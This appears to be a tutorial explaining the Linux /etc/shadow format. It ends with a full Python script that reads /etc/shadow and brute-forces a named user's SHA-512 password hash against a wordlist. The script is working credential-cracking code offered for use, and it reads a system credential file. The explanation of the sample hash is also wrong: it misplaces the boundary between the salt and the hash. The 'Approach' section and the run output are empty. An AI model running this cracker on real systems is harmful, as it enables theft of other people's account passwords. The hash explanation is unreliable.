1. Prerequisites
1.1 Where Linux stores user passwords
Path: /etc/shadow
Format: fields separated by ":"
account name : password (already encoded; * means no password) : date of last password change : days before the password may be changed again : days after which the password must be changed : days of warning before the password must be changed : grace days after the password expires : account expiry date : reserved
1.2 Password format
$X$salt$encode
X: the hash algorithm used; 1 is MD5, 5 is SHA-256, 6 is SHA-512
salt: the salt value mixed into the password before hashing
encode: the hash value, obtained by hashing the password together with the salt
For example:
$6$4n5EM.O0fTM0m7KG$L/rp8NyPBpFH5zoCefKMHlFhuCUGCttmSGt.jaUmbZOmEWHS.yp/y.WtaMS.5nFMAORrlCBjc39J0nXuqk9AD1
This uses the SHA-512 hash algorithm, the salt is 4n5EM.O0fTM0m7KG$L, and the hash value is rp8NyPBpFH5zoCefKMHlFhuCUGCttmSGt.jaUmbZOmEWHS.yp/y.WtaMS.5nFMAORrlCBjc39J0nXuqk9AD1
1.3 Python's crypt() function on Linux
Import the library: import crypt
Format: crypt.crypt("password", "salt")
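As an added illustration of the nine-field shadow layout and the $X$salt$encode format described above (this is not code from the original post), a parser that splits an entry into its fields and its algorithm, salt and hash parts, and flags accounts still on MD5 for an audit. The sample entries and user names are constructed; only the SHA-512 hash is the one quoted in 1.2.

```python
from dataclasses import dataclass
from typing import Optional
# Hash ids of the modular crypt format described above
HASH_IDS = {"1": "MD5", "5": "SHA-256", "6": "SHA-512"}

# Constructed sample entries (hypothetical users): alice carries the SHA-512 hash quoted above,
# bob's MD5 hash is a made-up placeholder of the right shape, daemon has no usable password
SAMPLE_SHADOW = """\
alice:$6$4n5EM.O0fTM0m7KG$L/rp8NyPBpFH5zoCefKMHlFhuCUGCttmSGt.jaUmbZOmEWHS.yp/y.WtaMS.5nFMAORrlCBjc39J0nXuqk9AD1:19000:0:99999:7:::
bob:$1$abcdefgh$0123456789abcdefghijkl:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
"""
@dataclass
class ShadowEntry:
    user: str
    algorithm: Optional[str]  # None when the account has no usable password
    salt: Optional[str]
    digest: Optional[str]
    last_change: int  # field 3: days since 1970-01-01
    max_days: int     # field 5: days after which the password must change

def parse_password_field(field):
    """Split '$X$salt$encode' into (algorithm, salt, digest); '*', '!...' or empty means no usable password."""
    if field in ("", "*") or field.startswith("!"):
        return None, None, None
    parts = field.split("$")  # parts[0] is '' because the field starts with '$'
    if len(parts) > 2 and parts[2].startswith("rounds="):  # glibc form '$6$rounds=N$salt$hash'
        del parts[2]
    if len(parts) < 4 or parts[0] != "":
        raise ValueError("unrecognised password field: %r" % field)
    algo = HASH_IDS.get(parts[1], "unknown($%s$)" % parts[1])
    return algo, parts[2], "$".join(parts[3:])

def parse_shadow(text):
    """Parse the nine colon-separated fields of each shadow line."""
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        f = line.split(":")
        if len(f) != 9:
            raise ValueError("expected 9 fields, got %d: %r" % (len(f), line))
        algo, salt, digest = parse_password_field(f[1])
        entries.append(ShadowEntry(f[0], algo, salt, digest, int(f[2] or 0), int(f[4] or 0)))
    return entries

def weak_hash_users(entries):
    """Accounts still hashed with MD5 ($1$), which an audit should flag for rehashing."""
    return [e.user for e in entries if e.algorithm == "MD5"]
```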
2. Approach
3. Full code
#!/usr/bin/env python3
import crypt  # Unix only; deprecated since Python 3.11 and removed in 3.13

# Read the shadow file and pull out the encoded password of the target user
def get_user(txtfile, target="lyq"):
    with open(txtfile, "rt") as f:
        data = f.readlines()
    for line in data:
        fields = line.split(":")
        user = fields[0]
        password_hx = fields[1]
        if user != target:
            continue
        print("要爆破的用户:%s" % user)
        salt = password_hx.split("$")[2]  # "$6$salt$hash" -> salt
        passwd = password_hx
        return salt, passwd
    return None  # target user not present in the file

# Load the password dictionary file, one candidate per line
def dict_passwd(txtfile):
    with open(txtfile, "rt") as f:
        data = f.readlines()
    pwlist = []
    for line in data:
        pwlist.append(line.rstrip("\n"))
    return pwlist

# The brute-force loop: hash each candidate with the same salt and compare
def boom(pwlist, salt, passwd):
    salt = "$6$" + salt  # rebuild the "$6$salt" prefix that crypt() expects
    for password in pwlist:
        cryptword = crypt.crypt(password, salt)
        if cryptword == passwd:
            print("密码为:", password)
            return
    # only reached when no candidate matched
    print("没有找到密码")

if __name__ == "__main__":
    file1 = "/root/桌面/password.txt"
    file2 = "/etc/shadow"
    pwlist = dict_passwd(file1)
    result = get_user(file2)
    if result is None:
        raise SystemExit("target user not found in %s" % file2)
    salt, passwd = result
    boom(pwlist, salt, passwd)
Run result: